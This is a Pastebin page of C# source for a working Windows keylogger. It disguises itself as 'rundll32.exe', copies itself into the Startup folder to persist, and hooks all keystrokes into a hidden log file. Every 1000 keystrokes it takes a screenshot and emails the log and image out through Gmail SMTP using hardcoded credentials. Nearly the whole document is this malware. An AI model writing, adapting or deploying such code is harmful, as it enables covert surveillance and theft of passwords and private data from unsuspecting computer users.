API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 18th, 2018
161
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.03 KB | None | 0 0
raw download clone embed print report
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Text;
  5. using System.Threading.Tasks;
  6. using System.Windows.Forms;
  7. using System.Runtime.InteropServices;
  8. using System.Diagnostics;
  9. using System.IO;
  10. using System.Net;
  11. using System.Net.Mail;
  12. using System.Drawing;
  13. using System.Drawing.Imaging;
  14.  
  15. namespace rundll32
  16. {
  17. class Program
  18. {
  19. /*
  20. for creating hidden applications
  21. create project as console app
  22. solution explorer>rightclick properties of project (or alt+enter)
  23. change output to windows form
  24. */
  25. public static int logged = 0;
  26. //keyboard hook ID
  27. private const int WH_KEYBOARD_LL = 13;
  28. //VK stuff
  29. private const int WM_KEYDOWN = 0x0100;
  30. private static LowLevelKeyboardProc _proc = HookCallback;
  31. private static IntPtr _hookID = IntPtr.Zero;
  32.  
  33. //run hook
  34. public static void Main()
  35.  
  36. {
  37. //get current exe name and path
  38. String fileName = String.Concat(Process.GetCurrentProcess().ProcessName, ".exe");
  39. String filePath = Path.Combine(Environment.CurrentDirectory, fileName);
  40.  
  41. //check if file exists first; errors out otherwise
  42. String testpath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Startup), "rundll32.exe");
  43. if (!File.Exists(testpath))
  44. {
  45. //copy exe into startup folder
  46. File.Copy(filePath, Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Startup), fileName));
  47. }
  48. //WAIT FOR OTHER APPLICATION TO CLOSE SO CLOSE CALL DOES NOT FUCK SHIT UP
  49. //System.Threading.Thread.Sleep(20000);
  50. File.Delete("C:\\Users\\Public\\Documents\\dll32.txt");
  51. File.Delete(@"C:\Users\Public\Documents\dll322.txt");
  52.  
  53.  
  54. _hookID = SetHook(_proc);
  55. Application.Run();
  56. UnhookWindowsHookEx(_hookID);
  57. }
  58.  
  59. //write data to temp directory
  60. public static void WriteFile(string ToWrite)
  61. {
  62. //directory to write to
  63. string path = @"C:\Users\Public\Documents\dll32.txt";
  64. string appendText = ToWrite;
  65. if (string.Equals("Space", ToWrite))
  66. {
  67. appendText = new string(' ', 1);
  68. }
  69. if (string.Equals("Return", ToWrite))
  70. {
  71. appendText = Environment.NewLine;
  72. }
  73. if (string.Equals("Oemcomma", ToWrite))
  74. {
  75. appendText = new string(',', 1);
  76. }
  77. if (string.Equals("OemQuestion", ToWrite))
  78. {
  79. appendText = new string('?', 1);
  80. }
  81. if (string.Equals("OemPeriod", ToWrite))
  82. {
  83. appendText = new string('.', 1);
  84. }
  85. File.AppendAllText(path, appendText);
  86. }
  87.  
  88. //create keyboard hook
  89. private static IntPtr SetHook(LowLevelKeyboardProc proc)
  90.  
  91. {
  92. using (Process curProcess = Process.GetCurrentProcess())
  93. using (ProcessModule curModule = curProcess.MainModule)
  94. {
  95. return SetWindowsHookEx(WH_KEYBOARD_LL, proc,GetModuleHandle(curModule.ModuleName), 0);
  96. }
  97. }
  98.  
  99. //actual logging code
  100. private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
  101. private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
  102. {
  103. if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
  104. {
  105. int vkCode = Marshal.ReadInt32(lParam);
  106. string output = Convert.ToString((Keys)vkCode);
  107. if (!string.Equals("LShiftKey", output) && !string.Equals("LControlKey", output) && !string.Equals("Capital", output) && !string.Equals("Tab", output) && !string.Equals("Up", output) && !string.Equals("Down", output) && !string.Equals("Left", output) && !string.Equals("Right", output))
  108. {
  109. WriteFile(output);
  110. }
  111. logged++;
  112. if (logged == 1000)
  113. {
  114. screenshot_email();
  115. email_send();
  116. //alternate method
  117. //Process.Start(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Startup), "rundll32.exe"));
  118. //Application.Exit();
  119. Application.Restart();
  120. }
  121. }
  122. return CallNextHookEx(_hookID, nCode, wParam, lParam);
  123. }
  124.  
  125.  
  126. public static void screenshot_email()
  127. {
  128. //screenshot attachment
  129. Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height);
  130.  
  131. Graphics graphics = Graphics.FromImage(bitmap as Image);
  132.  
  133. graphics.CopyFromScreen(0, 0, 0, 0, bitmap.Size);
  134.  
  135. bitmap.Save("C:\\Users\\Public\\Documents\\screenshot.jpeg", ImageFormat.Jpeg);
  136. //screenshot attachment
  137. }
  138. //send captured keystrokes and screenshot to fake gmail account to check later
  139. public static void email_send()
  140. {
  141. MailMessage mail = new MailMessage();
  142. SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com");
  143. mail.From = new MailAddress("satanscock6969@gmail.com");
  144. mail.To.Add("satanscock6969@gmail.com");
  145. mail.Subject = "Test Mail - 1";
  146. mail.Body = "mail with attachment";
  147. Attachment attachment;
  148. Attachment attachment2;
  149. File.Copy(@"C:\Users\Public\Documents\dll32.txt", @"C:\Users\Public\Documents\dll322.txt");
  150. attachment = new Attachment(@"C:\Users\Public\Documents\dll322.txt");
  151. attachment2 = new Attachment(@"C:\Users\Public\Documents\screenshot.jpeg");
  152. mail.Attachments.Add(attachment);
  153. mail.Attachments.Add(attachment2);
  154. SmtpServer.Port = 587;
  155. SmtpServer.Credentials = new NetworkCredential("satanscock6969@gmail.com", "truthpass1");
  156. SmtpServer.EnableSsl = true;
  157. SmtpServer.Send(mail);
  158. }
  159.  
  160. //import windows processes
  161. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  162. private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
  163. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  164. [return: MarshalAs(UnmanagedType.Bool)]
  165. private static extern bool UnhookWindowsHookEx(IntPtr hhk);
  166. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  167. private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);
  168. [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  169. private static extern IntPtr GetModuleHandle(string lpModuleName);
  170. }
  171. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!